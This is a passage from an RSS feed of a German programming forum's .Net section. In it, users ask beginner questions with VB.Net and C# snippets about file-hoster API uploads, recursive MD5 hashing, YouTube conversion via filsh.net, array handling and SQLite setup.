			<pubDate>Wed, 04 Nov 2015 20:05:55 GMT</pubDate>
			<description>Ich versuche mit meinem Programm eine Datei auf share-online.biz hochzuladen. Die Seite bietet auch eine API die sich *_hier...</description>
			<content:encoded><![CDATA[<div>Ich versuche mit meinem Programm eine Datei auf share-online.biz hochzuladen. Die Seite bietet auch eine API die sich <b><u><a href="http://www.share-online.biz/uploadapi/" target="_blank" rel="nofollow">hier</a></u></b> finden lässt.<br />
Allerding sscheitere ich immer beim hochladen mit der Fehlermeldung: <div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			Der Remoteserver hat einen Fehler zurückgegeben: (415) Unsupported Media Type.
			
		<hr />
	</div>
</div>Das sind die Variablen:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Upload the data:<br />
<br />
Getting the session is really easy, uploading without any chunk-usage, too. So we start with the single file upload ;-):<br />
Single Upload:<br />
&nbsp; &nbsp; &nbsp; &nbsp; Request to:&nbsp; &nbsp; &nbsp; &nbsp; http://server/upv3.php<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Required Vars:<br />
&nbsp; &nbsp; &nbsp; &nbsp; [username]&nbsp; &nbsp; &nbsp; &nbsp;  account username<br />
&nbsp; &nbsp; &nbsp; &nbsp; [password]&nbsp; &nbsp; &nbsp; &nbsp;  account password<br />
&nbsp; &nbsp; &nbsp; &nbsp; [upload_session]&nbsp;  upload session name from step 1<br />
&nbsp; &nbsp; &nbsp; &nbsp; [chunk_no]&nbsp; &nbsp; &nbsp; &nbsp;  set to &quot;1&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; [chunk_number]&nbsp; &nbsp;  set to &quot;1&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; [filesize]&nbsp; &nbsp; &nbsp; &nbsp;  filesize of current file in bytes<br />
&nbsp; &nbsp; &nbsp; &nbsp; [fn]&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  filedata (in HTTP forms known as type=&quot;file&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; [finalize]&nbsp; &nbsp; &nbsp; &nbsp;  set to &quot;1&quot;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Response:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DOWNLOAD-URL;FILESIZE;MD5<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Example:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  http://www.share-online.biz/dl/HJD74ZDM1;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  6547231;316508123e89909723fe95945caf00a5<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  (linebreak only in example!)</code><hr />
</div>Und mein Programm Code ist folgend:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
 Using client As New WebClient<br />
<br />
            'Variablen in NameValueCollection speichern<br />
            Dim uploadVar As New Specialized.NameValueCollection<br />
<br />
            uploadVar.Add(&quot;username&quot;, soUserNameBox.Text)<br />
            uploadVar.Add(&quot;password&quot;, soPasswordBox.Text)<br />
            uploadVar.Add(&quot;upload_session&quot;, sessionName)<br />
            uploadVar.Add(&quot;chunk_no&quot;, 1)<br />
            uploadVar.Add(&quot;chunk_number&quot;, 1)<br />
            uploadVar.Add(&quot;filesize&quot;, fileSize)<br />
            uploadVar.Add(&quot;fn&quot;, fileName)<br />
            uploadVar.Add(&quot;finalize&quot;, 1)<br />
<br />
<br />
            Try<br />
<br />
                'API Upload<br />
                Dim responsebytes = client.UploadValues(&quot;http://&quot; &amp; uploadServer, &quot;POST&quot;, uploadVar)<br />
                Dim responsebody = (New UTF8Encoding).GetString(responsebytes)<br />
                MessageBox.Show(responsebody)<br />
<br />
            Catch e As WebException<br />
<br />
                MsgBox(e.Message)<br />
<br />
            End Try<br />
        End Using
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Wäre nett wenn jemand ne Idee hätte :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>milchbubix</dc:creator>
			<guid isPermaLink="true">net-94/share-online-biz-datei-upload-per-api-37784</guid>
		</item>
		<item>
			<title>VB.Net String() darstellen</title>
			<link>net-94/string-darstellen-37757?goto=newpost</link>
			<pubDate>Wed, 28 Oct 2015 13:08:24 GMT</pubDate>
			<description>Was ist der beste Weg ein String Array in einer Tabelle anzuzeigen (ListView, DataGridView ...)?  
 
Das Array sieht folgendermaßen aus: 
Anhang 9051...</description>
			<content:encoded><![CDATA[<div>Was ist der beste Weg ein String Array in einer Tabelle anzuzeigen (ListView, DataGridView ...)? <br />
<br />
Das Array sieht folgendermaßen aus:<br />
<a href="https://u-labs.de/forum/attachment.php?attachmentid=9051&amp;d=1446037587" id="attachment9051" rel="Lightbox_0" ><img src="https://u-labs.de/forum/attachment.php?attachmentid=9051&amp;d=1446037587&amp;thumb=1" border="0" alt="Klicke auf die Grafik für eine größere Ansicht&nbsp;

Name:	stringarry.PNG&nbsp;
Hits:	224&nbsp;
Größe:	6,2 KB&nbsp;
ID:	9051" class="thumbnail" style="float:CONFIG" /></a><br />
<br />
Und soll in einer Tabelle angezeigt werden, die Spalten haben dann jeweils überschriften die gleich bleiben (1=No. 2=Status 3=Hoster ...) und jeder Wert wird in eine Spalte eingetragen, das nächste Array dann in die nächste Zeile und so weiter.</div>


	<div style="padding:10px">

	
		<fieldset class="fieldset">
			<legend>Miniaturansichten angehängter Grafiken</legend>
			<div style="padding:10px">
			
<a href="https://u-labs.de/forum/attachment.php?attachmentid=9051&amp;d=1446037587" 
rel="Lightbox_416590" id="attachment9051"
><img class="thumbnail" src="https://u-labs.de/forum/attachment.php?attachmentid=9051&amp;stc=1&amp;thumb=1&amp;d=1446037587" 
alt="Klicke auf die Grafik für eine größere Ansicht&nbsp;

Name:	stringarry.PNG&nbsp;
Hits:	-&nbsp;
Größe:	6,2 KB&nbsp;
ID:	9051"/></a>
&nbsp;

			</div>
		</fieldset>
	

	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>milchbubix</dc:creator>
			<guid isPermaLink="true">net-94/string-darstellen-37757</guid>
		</item>
		<item>
			<title>VB.Net API Zugriff auf relink.us über WebClient</title>
			<link>net-94/api-zugriff-relink-us-ueber-webclient-37740?goto=newpost</link>
			<pubDate>Sun, 25 Oct 2015 12:21:25 GMT</pubDate>
			<description><![CDATA[Stecke hier ein bisschen fest, das Programm soll die Ordner ID's aus einem Sring in ein NameSpaceValue packen, das klappt auch soweit doch wenn ich...]]></description>
			<content:encoded><![CDATA[<div>Stecke hier ein bisschen fest, das Programm soll die Ordner ID's aus einem Sring in ein NameSpaceValue packen, das klappt auch soweit doch wenn ich damit die Anfrage schicken will bekomme ich ein &quot;Ausnahmefehler während einer WebClient Anwendung&quot;<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
Private Sub getContainerInfo()<br />
        Using client2 As New Net.WebClient<br />
<br />
            'IDs vom Format (1 - xxxxx...;xxxx..) in (xxxxxx)<br />
            offlineContainerID = offlineContainerID.ToString.Substring(4)<br />
            Dim offlineContainerIDArray As Array = offlineContainerID.ToString.Split(&quot;;&quot;)<br />
<br />
            Dim containerInfoParam As New Specialized.NameValueCollection<br />
            'Container ID der Offline/Abused Ordner zu Parameter hinzufügen<br />
            For Each i As String In offlineContainerIDArray<br />
                containerInfoParam.Add(&quot;id&quot;, i)<br />
            Next<br />
            Try<br />
                'API abfrage nach Container Info<br />
                Dim responsebytes = client2.UploadValues(&quot;http://api.relink.us/container_info.php&quot;, &quot;GET&quot;, containerInfoParam)<br />
                Dim responsebody = (New UTF8Encoding).GetString(responsebytes)<br />
            Catch e As WebException<br />
                MsgBox(e.Message)<br />
            End Try<br />
        End Using<br />
    End Sub
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Falls es eine bessere Methode gibt mit der API zu kommunizieren bin ich offen für Verbesserungen :)<br />
<br />
EDIT: Relink.us Testordner (Offline): <a href="http://www.relink.us/f/2a2cdcb35871b2812b7326492115f3" target="_blank" rel="nofollow">http://www.relink.us/f/2a2cdcb35871b2812b7326492115f3</a></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>milchbubix</dc:creator>
			<guid isPermaLink="true">net-94/api-zugriff-relink-us-ueber-webclient-37740</guid>
		</item>
		<item>
			<title>VB.Net MD5 Hash aller Dateien eines Ordners + Unterordner erstellen</title>
			<link>net-94/md5-hash-aller-dateien-eines-ordners-unterordner-erstellen-37614?goto=newpost</link>
			<pubDate>Thu, 17 Sep 2015 15:07:08 GMT</pubDate>
			<description>Halle leute, 
 
Ich versuche gerade einen Updater für mein Spiel zu basteln und will von allen datein die auf dem Server liegen den md5 hash mit dem...</description>
			<content:encoded><![CDATA[<div>Halle leute,<br />
<br />
Ich versuche gerade einen Updater für mein Spiel zu basteln und will von allen datein die auf dem Server liegen den md5 hash mit dem offline daten vergleichen. die ausgabe aller datein habe ich auf dem server schon per php fertig. nun benötige ich hilfe für den clienten. Der Ordner enthält weitere Unterordner und Dateien sowie Unterordner in den Unterordnern. Ich bekomme in dem fall überhaupt keine einfache schleife hin die durch alle Ordner läuft. Wäre für jede Hilfe dankbar.<br />
<br />
Micha,<br />
<br />
:Nachtrag:<br />
<br />
Als Function nutze ich<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			Public Function MD5FileHash(ByVal sFile As String) As String<br />
    Dim MD5 As New MD5CryptoServiceProvider<br />
    Dim Hash As Byte()<br />
    Dim Result As String = &quot;&quot;<br />
    Dim Tmp As String = &quot;&quot;<br />
 <br />
    Dim FN As New FileStream(sFile, FileMode.Open, FileAccess.Read, FileShare.Read, 8192)<br />
    MD5.ComputeHash(FN)<br />
    FN.Close()<br />
 <br />
    Hash = MD5.Hash<br />
    Result = Strings.Replace(BitConverter.ToString(Hash), &quot;-&quot;, &quot;&quot;<br />
    Return Result<br />
End Function
			
		<hr />
	</div>
</div>ich brauche halt nur einen lösungsvorschlag um alle ordner + datein recursive durchlaufen zu können.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>soulreafer</dc:creator>
			<guid isPermaLink="true">net-94/md5-hash-aller-dateien-eines-ordners-unterordner-erstellen-37614</guid>
		</item>
		<item>
			<title>Youtube Download über Filsh</title>
			<link>net-94/youtube-download-ueber-filsh-37529?goto=newpost</link>
			<pubDate>Fri, 21 Aug 2015 05:04:22 GMT</pubDate>
			<description>Hallo, bin gerade dabei ein Snippet zu schreiben welches mir Youtube Videos über filsh.net herunterlädt. 
 
Vorgehensweise: 
-POST Parameter setzen...</description>
			<content:encoded><![CDATA[<div>Hallo, bin gerade dabei ein Snippet zu schreiben welches mir Youtube Videos über filsh.net herunterlädt.<br />
<br />
Vorgehensweise:<br />
-POST Parameter setzen<br />
-Request zur Erstellung eines &quot;Download Tickets&quot; durchführen<br />
-Request Token &amp; Host Name des zugewiesenen Server holen(RegEx)<br />
-Request Status URL erstellen(Setzt sich aus Host Name &amp; Token zusammen)<br />
<br />
Diese Status URL frage ich dann in einer Loop(mit 1 Sek. Delay) so lange ab, bis der Status nicht mehr auf &quot;pending&quot; ist. Das Problem an der ganzen Sache ist, das er den Status einfach nicht ändert... auch wenn ich die Loop 2 Minuten oder länger laufen lasse, da tut sich nix mehr...<br />
<br />
Anscheinend ist diese URL aber nicht die einzige, wo man den Status bekommt... Mit der Firefox Netzwerk Analyse kann ich sehen das ich wärend dem Downloaden/Converten des Videos folgende URL im Sekundentakt geladen wird: <a href="http://c6.filsh.net/api/process/3uScl/status?jsoncallback=jQuery20305287900135514353_1440132717974&amp;_=1440132717977" target="_blank" rel="nofollow">http://c6.filsh.net/api/process/3uSc...=1440132717977</a><br />
<br />
Hier sehen wir wieder das sich die URL mitunter aus Host Name &amp; Token ID zusammen setzt. Jedoch werden hier 2 Parameter(jsoncallback, _) übergeben von denen ich aber nicht weiß von wo oder wie ich sie bekommen kann...<br />
<br />
Naja, hier jedenfalls mal mein Code:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //declare youtube url &amp; video id<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string youtubeURL = &quot;https://www.youtube.com/watch?v=&quot;;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string videoID = &quot;pJyQpAiMXkg&quot;;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //declare filsh ticket<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string ticketURL = &quot;http://de.filsh.net/api/tickets&quot;;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //declare post data<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; NameValueCollection postData = new NameValueCollection();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; postData.Add(&quot;url[]&quot;, youtubeURL + videoID);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; postData.Add(&quot;settings[format]&quot;, &quot;mp3&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; postData.Add(&quot;settings[dimensions]&quot;, &quot;original&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; postData.Add(&quot;settings[audioBitrate]&quot;, &quot;original&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; postData.Add(&quot;settings[videoBitrate]&quot;, &quot;original&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; postData.Add(&quot;settings[volume]&quot;, &quot;original&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; postData.Add(&quot;settings[timeframeFrom]&quot;, string.Empty);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; postData.Add(&quot;settings[timeframeTo]&quot;, string.Empty);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; postData.Add(&quot;settings[url]=&quot;, string.Empty);<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //declare web client<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WebClient httpClient = new WebClient();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; httpClient.Encoding = Encoding.UTF8;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; httpClient.Proxy = null;<br />
&nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //declare response vars<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string html = string.Empty;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; byte[] bytes = null;&nbsp; &nbsp; &nbsp; <br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //create ticket request<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; try<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; bytes = httpClient.UploadValues(ticketURL, &quot;post&quot;, postData);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; html = Encoding.UTF8.GetString(bytes);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; } catch(Exception e) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;ERROR[0]: &quot; + e.Message);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.ReadLine();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //get request token<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Match tokenMT = Regex.Match(html, &quot;\&quot;token\&quot;:\&quot;(?&lt;token&gt;.*?)\&quot;&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (!tokenMT.Success) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;ERROR[1]: Unable to receive token!&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.ReadLine();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //set request token<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string reqToken = tokenMT.Groups[&quot;token&quot;].Value;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //get host name<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Match hostMT = Regex.Match(html, &quot;\&quot;hostname\&quot;:\&quot;(?&lt;host&gt;.*?)\&quot;&quot;);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (!hostMT.Success) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;ERROR[2]: Unable to receive host name!&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.ReadLine();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //set host name<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string host = hostMT.Groups[&quot;host&quot;].Value;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //declare state url<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string stateURL = &quot;http://&quot; + host + &quot;/api/process/&quot; + reqToken + &quot;/status&quot;;<br />
<br />
&nbsp; &nbsp; Wait:&nbsp;  <br />
&nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //create state request<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; try<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; html = httpClient.DownloadString(stateURL);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(html);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; catch (Exception e)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;ERROR[3]: &quot; + e.Message);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.ReadLine();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //check response text<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (html == &quot;{\&quot;status\&quot;:\&quot;pending\&quot;}&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Thread.Sleep(1000);&nbsp;  <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; goto Wait;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }</code><hr />
</div>Wäre cool wenn jemand helfen kann!</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/youtube-download-ueber-filsh-37529</guid>
		</item>
		<item>
			<title>C# List Foreach Rückgabewert?</title>
			<link>net-94/c-list-foreach-rueckgabewert-37417?goto=newpost</link>
			<pubDate>Tue, 28 Jul 2015 08:58:14 GMT</pubDate>
			<description><![CDATA[Tollerweise kann man ja in C# mit Foreach eine einfache Foreach machen ohne eine foreach Schleife zu benötigen: 
 
 
List<string> myList = new...]]></description>
			<content:encoded><![CDATA[<div>Tollerweise kann man ja in C# mit Foreach eine einfache Foreach machen ohne eine foreach Schleife zu benötigen:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
List&lt;string&gt; myList = new List&lt;string&gt;();<br />
            myList.Add(&quot;Test1&quot;);<br />
            myList.Add(&quot;Test2&quot;);<br />
<br />
            string s = &quot;&quot;;<br />
            myList.ForEach(lol =&gt; s += lol);<br />
<br />
            Console.WriteLine(s);<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Nur frage ich mich wieso ich die eine extra Zeile benötige? Warum kann ich das was ich in der Foreach Methode mache nicht als Rückgabewert erhalten? <br />
Pseudocode:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
string s = myList.ForEach(lol =&gt; += lol);<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Gibt mir so einen Errro aus aber schade dass es nicht so geht, gibt es keine Möglichkeit wie man das abkürzen könnte?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sido</dc:creator>
			<guid isPermaLink="true">net-94/c-list-foreach-rueckgabewert-37417</guid>
		</item>
		<item>
			<title>Brauche sichere Verbindung zum Schutz vor Sniffer</title>
			<link>net-94/brauche-sichere-verbindung-zum-schutz-vor-sniffer-37110?goto=newpost</link>
			<pubDate>Mon, 25 May 2015 16:51:44 GMT</pubDate>
			<description>Hey :D 
Ich programmierte letztens mit VB.Net ein Programm, welches sich mit FTP verbindet und dort halt Dateien downloaded/uploaded. 
FTP ist aber...</description>
			<content:encoded><![CDATA[<div>Hey :D<br />
Ich programmierte letztens mit VB.Net ein Programm, welches sich mit FTP verbindet und dort halt Dateien downloaded/uploaded.<br />
FTP ist aber unverschlüsselt und meine Datei lässt sich leicht sniffen. <br />
Was für Möglichkeiten gibt es, sein Programm vor Sniffing zu schützen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Noob</dc:creator>
			<guid isPermaLink="true">net-94/brauche-sichere-verbindung-zum-schutz-vor-sniffer-37110</guid>
		</item>
		<item>
			<title>UI Controls aktualisieren</title>
			<link>net-94/ui-controls-aktualisieren-36935?goto=newpost</link>
			<pubDate>Sat, 02 May 2015 04:31:34 GMT</pubDate>
			<description>Heyho! 
Wollte mal gerne von euch wissen, was die beste Lösung ist um UI Controls(genauer gesagt Labels), in einem Interval  
von ca. 200-300...</description>
			<content:encoded><![CDATA[<div>Heyho!<br />
Wollte mal gerne von euch wissen, was die beste Lösung ist um UI Controls(genauer gesagt Labels), in einem Interval <br />
von ca. 200-300 Millisekunden zu aktualisieren, ohne das die Performance bzw. die Stabilität der Anwendung darunter leidet? <br />
Momentan aktualisiere ich meine Labels ganz normal aus einem Thread heraus mittels Invoke-Funktion. Falls das was zur Sache<br />
 tut: Die Labels dienen als Counter und behinhalten demach nur Zahlen!<br />
<br />
Grüße, exception</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/ui-controls-aktualisieren-36935</guid>
		</item>
		<item>
			<title>Create Strings() from String()</title>
			<link>net-94/create-strings-from-string-36893?goto=newpost</link>
			<pubDate>Sun, 26 Apr 2015 06:58:55 GMT</pubDate>
			<description>Hallo, 
versuche gerade ein String Array in mehrere String Arrays zu zerlegen. Klingt ansich ja nicht so schwierig aber ich bekomms nicht gebacken.^^...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
versuche gerade ein String Array in mehrere String Arrays zu zerlegen. Klingt ansich ja nicht so schwierig aber ich bekomms nicht gebacken.^^<br />
<br />
<u>Beispiel:</u><br />
Dim StrArr0() as String  //Enthält 1250304 Einträge<br />
<br />
Aus diesem Array will ich jetzt so viele Arrays wie Möglich mit 100 Einträgen erstellen.<br />
<br />
Klar ist mir natürlich das ich die Anzahl der Einträge von  StrArr0() durch 100 dividieren muss um die Anzahl der Möglichen 100er Arrays zu bekommen. Anschließend das Ergebniss wieder mit 100 multiplizieren und von der Gesamt Anzahl der Einträge(StrArr0.Count) subtrahieren um die Größe des letzt möglichen Arrays zu bekommen.<br />
<br />
Kleines Snippet zum Verständnis:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; &nbsp; &nbsp; &nbsp; //String Array mit vielen, vielen Einträgen<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim StrArr0() As String = File.ReadAllLines(&quot;C:\bla.txt&quot;)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; //Enthält die Anzahl von Max. Möglichen Arrays mit 100 Einträgen<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim _Count As Integer = StrArr0.Count / 100<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; //Enthält die Anzahl der übrigen Einträge die nicht mehr für ein Array mit 100 Items reichen<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim _Left As Integer = StrArr0.Count - _Count * 100<br />
<br />
&nbsp; &nbsp; &nbsp;  //Arrays erstellen<br />
&nbsp; &nbsp; &nbsp;  //...</code><hr />
</div>Bin mal gespannt ob jemand versteht was ich will :D</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/create-strings-from-string-36893</guid>
		</item>
		<item>
			<title>C# Sqlite in C#</title>
			<link>net-94/sqlite-in-c-36766?goto=newpost</link>
			<pubDate>Sun, 05 Apr 2015 22:28:22 GMT</pubDate>
			<description>Ich muss eine Anwendung programmieren die eine Sqlite Datenbank benutzt. Ich habe das Nuget Packet https://www.nuget.org/packages/System.Data.SQLite...</description>
			<content:encoded><![CDATA[<div>Ich muss eine Anwendung programmieren die eine Sqlite Datenbank benutzt. Ich habe das Nuget Packet <a href="https://www.nuget.org/packages/System.Data.SQLite" target="_blank" rel="nofollow">https://www.nuget.org/packages/System.Data.SQLite</a> installiert und damit ich die Datenbank im Explorer hinzufügen kann <a href="https://system.data.sqlite.org/downloads/1.0.95.0/sqlite-netFx451-setup-bundle-x64-2013-1.0.95.0.exe" target="_blank" rel="nofollow">https://system.data.sqlite.org/downl...3-1.0.95.0.exe</a> in der gleichen Version (1.0.95) wie bei nuget. Anschließend will ich die Datenbank laden aber Sqlite erscheint einfach nicht als Quelle sondern nur Microsoft Sql :mad:<br />
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=8791&amp;d=1428272781" border="0" alt="Name:  scheiße.png
Hits: 518
Größe:  4,0 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
So müsste es aussehen:<br />
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=8790&amp;d=1428272599" border="0" alt="Name:  122213_1411_basesdedato7.png
Hits: 430
Größe:  25,9 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
So habe ich es probiert:<br />
